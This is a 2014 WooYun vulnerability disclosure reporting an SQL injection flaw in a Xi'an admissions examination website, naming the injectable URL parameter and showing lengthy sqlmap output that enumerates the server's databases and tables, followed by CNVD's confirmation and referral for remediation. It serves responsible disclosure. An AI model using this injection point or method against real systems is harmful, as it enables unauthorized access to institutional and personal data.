当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067219

漏洞标题:大数据系列之西安市招生考试网某处存在SQL注入漏洞(导致200个数据库泄露)

相关厂商:国家互联网应急中心

漏洞作者: 泳少

提交时间:2014-07-03 14:43

修复时间:2014-08-17 14:44

公开时间:2014-08-17 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-03: 细节已通知厂商并且等待厂商处理中
2014-07-08: 厂商已经确认,细节仅向厂商公开
2014-07-18: 细节向核心白帽子及相关领域专家公开
2014-07-28: 细节向普通白帽子公开
2014-08-07: 细节向实习白帽子公开
2014-08-17: 细节向公众公开

简要描述:

各种姿势。。。这个。。。恩。应该大厂商。

详细说明:

注入地址是这个

http://www.xaks.com.cn/showlist.html?sortid=08

本来呢以为没什么注入的。。但是在后面加了个'引起我的注意了

03.jpg

返回出错,。。然后我就丢到sqlmap跑了下裤子!!!

公开后未修复请小伙伴们别裤,否则后果自行承担。本次测试仅供国家互联网应急中心

漏洞证明:

04.jpg

[13:54:08] [INFO] retrieved: "dbo.roysched"
[13:54:08] [INFO] retrieved: "dbo.sales"
[13:54:08] [INFO] retrieved: "dbo.stores"
[13:54:09] [INFO] retrieved: "dbo.sysconstraints"
[13:54:09] [INFO] retrieved: "dbo.syssegments"
[13:54:09] [INFO] retrieved: "dbo.titleauthor"
[13:54:09] [INFO] retrieved: "dbo.titles"
[13:54:10] [INFO] retrieved: "dbo.titleview"
[13:54:10] [WARNING] the SQL query provided does not return any output
[13:54:10] [WARNING] the SQL query provided does not return any output
[13:54:11] [WARNING] the SQL query provided does not return any output
[13:54:11] [WARNING] the SQL query provided does not return any output
[13:54:12] [INFO] the SQL query used returns 2 entries
[13:54:12] [INFO] retrieved: "dbo.sysconstraints"
[13:54:13] [INFO] retrieved: "dbo.syssegments"
[13:54:14] [INFO] the SQL query used returns 34 entries
[13:54:14] [INFO] retrieved: "dbo.dtproperties"
[13:54:14] [INFO] retrieved: "dbo.sysconstraints"
[13:54:14] [INFO] retrieved: "dbo.syssegments"
[13:54:15] [INFO] retrieved: "dbo.View_111"
[13:54:18] [INFO] retrieved: "webistesnew.fzg_ly"
[13:54:18] [INFO] retrieved: "webistesnew.IP"
[13:54:19] [INFO] retrieved: "webistesnew.jhdzb"
[13:54:19] [INFO] retrieved: "webistesnew.Msg_Answer"
[13:54:19] [INFO] retrieved: "webistesnew.Msg_Department"
[13:54:19] [INFO] retrieved: "webistesnew.Msg_Question"
[13:54:20] [INFO] retrieved: "webistesnew.Msg_Qx"
[13:54:20] [INFO] retrieved: "webistesnew.Msg_Type"
[13:54:20] [INFO] retrieved: "webistesnew.Msg_user"
[13:54:20] [INFO] retrieved: "webistesnew.PhoneNotice"
[13:54:20] [INFO] retrieved: "webistesnew.pt_bm"
[13:54:21] [INFO] retrieved: "webistesnew.pt_js"
[13:54:21] [INFO] retrieved: "webistesnew.pt_jsmk"
[13:54:21] [INFO] retrieved: "webistesnew.pt_yh"
[13:54:21] [INFO] retrieved: "webistesnew.qqq"
[13:54:22] [INFO] retrieved: "webistesnew.T_datalist"
[13:54:22] [INFO] retrieved: "webistesnew.t_xtrz"
[13:54:22] [INFO] retrieved: "webistesnew.upload"
[13:54:22] [INFO] retrieved: "webistesnew.V_Message"
[13:54:22] [INFO] retrieved: "webistesnew.V_User"
[13:54:23] [INFO] retrieved: "webistesnew.v_ws_xinxizhongxin"
[13:54:23] [INFO] retrieved: "webistesnew.v_xinxinr"
[13:54:24] [INFO] retrieved: "webistesnew.v_xtrz"
[13:54:25] [INFO] retrieved: "webistesnew.v_yhjs"
[13:54:26] [INFO] retrieved: "webistesnew.ws_cylianjie"
[13:54:26] [INFO] retrieved: "webistesnew.ws_jianjie"
[13:54:26] [INFO] retrieved: "webistesnew.ws_pt_caidan"
[13:54:27] [INFO] retrieved: "webistesnew.ws_ws_caidan"
[13:54:27] [INFO] retrieved: "webistesnew.ws_xinxizhongxin"
[13:54:27] [INFO] retrieved: "webistesnew.zd_pinyin"
[13:54:27] [WARNING] the SQL query provided does not return any output
[13:54:28] [WARNING] the SQL query provided does not return any output
[13:54:28] [WARNING] the SQL query provided does not return any output
[13:54:28] [WARNING] the SQL query provided does not return any output
[13:54:29] [WARNING] the SQL query provided does not return any output
[13:54:32] [WARNING] the SQL query provided does not return any output
[13:54:33] [WARNING] the SQL query provided does not return any output
[13:54:33] [WARNING] the SQL query provided does not return any output
Database: tempdb
[2 tables]
+--------------------------------------------------+
| dbo.sysconstraints                               |
| dbo.syssegments                                  |
+--------------------------------------------------+
Database: websites
[34 tables]
+--------------------------------------------------+
| dbo.View_111                                     |
| dbo.[webistesnew.IP]                             |
| dbo.[webistesnew.Msg_Answer]                     |
| dbo.[webistesnew.Msg_Department]                 |
| dbo.[webistesnew.Msg_Question]                   |
| dbo.[webistesnew.Msg_Qx]                         |
| dbo.[webistesnew.Msg_Type]                       |
| dbo.[webistesnew.Msg_user]                       |
| dbo.[webistesnew.PhoneNotice]                    |
| dbo.[webistesnew.T_datalist]                     |
| dbo.[webistesnew.V_Message]                      |
| dbo.[webistesnew.V_User]                         |
| dbo.[webistesnew.fzg_ly]                         |
| dbo.[webistesnew.jhdzb]                          |
| dbo.[webistesnew.pt_bm]                          |
| dbo.[webistesnew.pt_js]                          |
| dbo.[webistesnew.pt_jsmk]                        |
| dbo.[webistesnew.pt_yh]                          |
| dbo.[webistesnew.qqq]                            |
| dbo.[webistesnew.t_xtrz]                         |
| dbo.[webistesnew.upload]                         |
| dbo.[webistesnew.v_ws_xinxizhongxin]             |
| dbo.[webistesnew.v_xinxinr]                      |
| dbo.[webistesnew.v_xtrz]                         |
| dbo.[webistesnew.v_yhjs]                         |
| dbo.[webistesnew.ws_cylianjie]                   |
| dbo.[webistesnew.ws_jianjie]                     |
| dbo.[webistesnew.ws_pt_caidan]                   |
| dbo.[webistesnew.ws_ws_caidan]                   |
| dbo.[webistesnew.ws_xinxizhongxin]               |
| dbo.[webistesnew.zd_pinyin]                      |
| dbo.dtproperties                                 |
| dbo.sysconstraints                               |
| dbo.syssegments                                  |
+--------------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------------+
| dbo.authors                                      |
| dbo.discounts                                    |
| dbo.employee                                     |
| dbo.jobs                                         |
| dbo.pub_info                                     |
| dbo.publishers                                   |
| dbo.roysched                                     |
| dbo.sales                                        |
| dbo.stores                                       |
| dbo.sysconstraints                               |
| dbo.syssegments                                  |
| dbo.titleauthor                                  |
| dbo.titles                                       |
| dbo.titleview                                    |
+--------------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------------+
| dbo.MSreplication_options                        |
| dbo.[INFORMATION_SCHEMA.CHECK_CONSTRAINTS]       |
| dbo.[INFORMATION_SCHEMA.COLUMNS]                 |
| dbo.[INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE]     |
| dbo.[INFORMATION_SCHEMA.COLUMN_PRIVILEGES]       |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE]  |
| dbo.[INFORMATION_SCHEMA.DOMAINS]                 |
| dbo.[INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS]      |
| dbo.[INFORMATION_SCHEMA.KEY_COLUMN_USAGE]        |
| dbo.[INFORMATION_SCHEMA.PARAMETERS]              |
| dbo.[INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.ROUTINES]                |
| dbo.[INFORMATION_SCHEMA.ROUTINE_COLUMNS]         |
| dbo.[INFORMATION_SCHEMA.SCHEMATA]                |
| dbo.[INFORMATION_SCHEMA.TABLES]                  |
| dbo.[INFORMATION_SCHEMA.TABLE_CONSTRAINTS]       |
| dbo.[INFORMATION_SCHEMA.TABLE_PRIVILEGES]        |
| dbo.[INFORMATION_SCHEMA.VIEWS]                   |
| dbo.[INFORMATION_SCHEMA.VIEW_COLUMN_USAGE]       |
| dbo.[INFORMATION_SCHEMA.VIEW_TABLE_USAGE]        |
| dbo.spt_datatype_info                            |
| dbo.spt_datatype_info_ext                        |
| dbo.spt_fallback_db                              |
| dbo.spt_fallback_dev                             |
| dbo.spt_fallback_usg                             |
| dbo.spt_monitor                                  |
| dbo.spt_provider_types                           |
| dbo.spt_server_info                              |
| dbo.spt_values                                   |
| dbo.sysconstraints                               |
| dbo.syslogins                                    |
| dbo.sysoledbusers                                |
| dbo.sysopentapes                                 |
| dbo.sysremotelogins                              |
| dbo.syssegments                                  |
+--------------------------------------------------+
Database: msdb
[83 tables]
+--------------------------------------------------+
| dbo.RTblClassDefs                                |
| dbo.RTblClassExtension                           |
| dbo.RTblDBMProps                                 |
| dbo.RTblDBXProps                                 |
| dbo.RTblDTMProps                                 |
| dbo.RTblDTSProps                                 |
| dbo.RTblDatabaseVersion                          |
| dbo.RTblEQMProps                                 |
| dbo.RTblEnumerationDef                           |
| dbo.RTblEnumerationValueDef                      |
| dbo.RTblGENProps                                 |
| dbo.RTblIfaceDefs                                |
| dbo.RTblIfaceHier                                |
| dbo.RTblIfaceMem                                 |
| dbo.RTblMDSProps                                 |
| dbo.RTblNamedObj                                 |
| dbo.RTblOLPProps                                 |
| dbo.RTblParameterDef                             |
| dbo.RTblPropDefs                                 |
| dbo.RTblProps                                    |
| dbo.RTblRelColDefs                               |
| dbo.RTblRelshipDefs                              |
| dbo.RTblRelshipProps                             |
| dbo.RTblRelships                                 |
| dbo.RTblSIMProps                                 |
| dbo.RTblScriptDefs                               |
| dbo.RTblSites                                    |
| dbo.RTblSumInfo                                  |
| dbo.RTblTFMProps                                 |
| dbo.RTblTypeInfo                                 |
| dbo.RTblTypeLibs                                 |
| dbo.RTblUMLProps                                 |
| dbo.RTblUMXProps                                 |
| dbo.RTblVersionAdminInfo                         |
| dbo.RTblVersions                                 |
| dbo.RTblWorkspaceItems                           |
| dbo.backupfile                                   |
| dbo.backupmediafamily                            |
| dbo.backupmediaset                               |
| dbo.backupset                                    |
| dbo.log_shipping_databases                       |
| dbo.log_shipping_monitor                         |
| dbo.log_shipping_plan_databases                  |
| dbo.log_shipping_plan_history                    |
| dbo.log_shipping_plans                           |
| dbo.log_shipping_primaries                       |
| dbo.log_shipping_secondaries                     |
| dbo.logmarkhistory                               |
| dbo.mswebtasks                                   |
| dbo.restorefile                                  |
| dbo.restorefilegroup                             |
| dbo.restorehistory                               |
| dbo.sqlagent_info                                |
| dbo.sysalerts                                    |
| dbo.syscachedcredentials                         |
| dbo.syscategories                                |
| dbo.sysconstraints                               |
| dbo.sysdbmaintplan_databases                     |
| dbo.sysdbmaintplan_history                       |
| dbo.sysdbmaintplan_jobs                          |
| dbo.sysdbmaintplans                              |
| dbo.sysdownloadlist                              |
| dbo.sysdtscategories                             |
| dbo.sysdtspackagelog                             |
| dbo.sysdtspackages                               |
| dbo.sysdtssteplog                                |
| dbo.sysdtstasklog                                |
| dbo.sysjobhistory                                |
| dbo.sysjobs                                      |
| dbo.sysjobs_view                                 |
| dbo.sysjobschedules                              |
| dbo.sysjobservers                                |
| dbo.sysjobsteps                                  |
| dbo.sysnotifications                             |
| dbo.sysoperators                                 |
| dbo.syssegments                                  |
| dbo.systargetservergroupmembers                  |
| dbo.systargetservergroups                        |
| dbo.systargetservers                             |
| dbo.systargetservers_view                        |
| dbo.systaskids                                   |
| dbo.systasks                                     |
| dbo.systasks_view                                |
+--------------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------------+
| dbo.Categories                                   |
| dbo.CustomerCustomerDemo                         |
| dbo.CustomerDemographics                         |
| dbo.Customers                                    |
| dbo.EmployeeTerritories                          |
| dbo.Employees                                    |
| dbo.Invoices                                     |
| dbo.Region                                       |
| dbo.Shippers                                     |
| dbo.Suppliers                                    |
| dbo.Territories                                  |
| dbo.[Alphabetical list of products]              |
| dbo.[Category Sales for 1997]                    |
| dbo.[Current Product List]                       |
| dbo.[Customer and Suppliers by City]             |
| dbo.[Order Details Extended]                     |
| dbo.[Order Details Extended]                     |
| dbo.[Order Subtotals]                            |
| dbo.[Orders Qry]                                 |
| dbo.[Orders Qry]                                 |
| dbo.[Product Sales for 1997]                     |
| dbo.[Products Above Average Price]               |
| dbo.[Products Above Average Price]               |
| dbo.[Products by Category]                       |
| dbo.[Quarterly Orders]                           |
| dbo.[Sales Totals by Amount]                     |
| dbo.[Sales by Category]                          |
| dbo.[Summary of Sales by Quarter]                |
| dbo.[Summary of Sales by Year]                   |
| dbo.sysconstraints                               |
| dbo.syssegments                                  |
+--------------------------------------------------+
[13:54:33] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 243 times
[13:54:33] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[13:54:33] [INFO] fetched data logged to text files under 'D:\php\??\SQLMAP~1\Bi
n\output\www.xaks.com.cn'
[*] shutting down at 13:54:33

修复方案:

尼玛的。。好险我没脱裤子。。

版权声明:转载请注明来源 泳少@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-07-08 11:09

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给陕西分中心,由其后续协调教育主管部门处置。按信息泄露风险评分,rank 13

最新状态:

暂无